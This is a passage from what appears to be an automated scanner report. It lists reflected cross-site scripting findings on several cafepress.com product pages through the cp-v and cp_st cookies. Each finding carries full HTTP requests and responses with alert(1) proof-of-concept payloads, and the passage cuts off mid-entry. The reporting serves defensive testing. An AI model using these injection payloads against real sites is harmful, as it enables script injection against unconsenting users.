__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 59667 Date: Sun, 26 Dec 2010 13:48:52 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:52 GMT; path=/ Set-Cookie: cp_sc=100204; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:52 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59667 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '49536</script><script>alert(1)</script>00786d92ac ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.24. http://www.cafepress.com/+calendars [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+calendars
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f773c"-alert(1)-"fa99a9758e1 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+calendars HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAf773c"-alert(1)-"fa99a9758e1 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 57747 Date: Sun, 26 Dec 2010 13:49:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:15 GMT; path=/ Set-Cookie: cp_sc=100156; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:15 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 57747 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAf773c"-alert(1)-"fa99a9758e1 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.25. http://www.cafepress.com/+calendars [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+calendars
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 673c2</script><script>alert(1)</script>81eee94446c was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+calendars HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=673c2</script><script>alert(1)</script>81eee94446c ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 Cteonnt-Length: 57764 Date: Sun, 26 Dec 2010 13:49:13 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:13 GMT; path=/ Set-Cookie: cp_sc=100156; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:13 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 57764 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '673c2</script><script>alert(1)</script>81eee94446c ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.26. http://www.cafepress.com/+clocks [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+clocks
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 405f7"-alert(1)-"c5d27bb0659 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+clocks HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA405f7"-alert(1)-"c5d27bb0659 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 59340 Date: Sun, 26 Dec 2010 13:48:57 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/ Set-Cookie: cp_sc=100161; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59340 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA405f7"-alert(1)-"c5d27bb0659 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.27. http://www.cafepress.com/+clocks [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+clocks
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56c87</script><script>alert(1)</script>eb1ed059733 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+clocks HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=56c87</script><script>alert(1)</script>eb1ed059733 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 59367 Date: Sun, 26 Dec 2010 13:48:55 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:55 GMT; path=/ Set-Cookie: cp_sc=100161; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:55 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59367 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '56c87</script><script>alert(1)</script>eb1ed059733 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.28. http://www.cafepress.com/+coasters [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+coasters
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d05a"-alert(1)-"a640bcdbb5e was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+coasters HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA9d05a"-alert(1)-"a640bcdbb5e ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 59298 Date: Sun, 26 Dec 2010 13:48:59 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:59 GMT; path=/ Set-Cookie: cp_sc=100176; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:59 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59298 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA9d05a"-alert(1)-"a640bcdbb5e "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.29. http://www.cafepress.com/+coasters [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+coasters
Issue detail
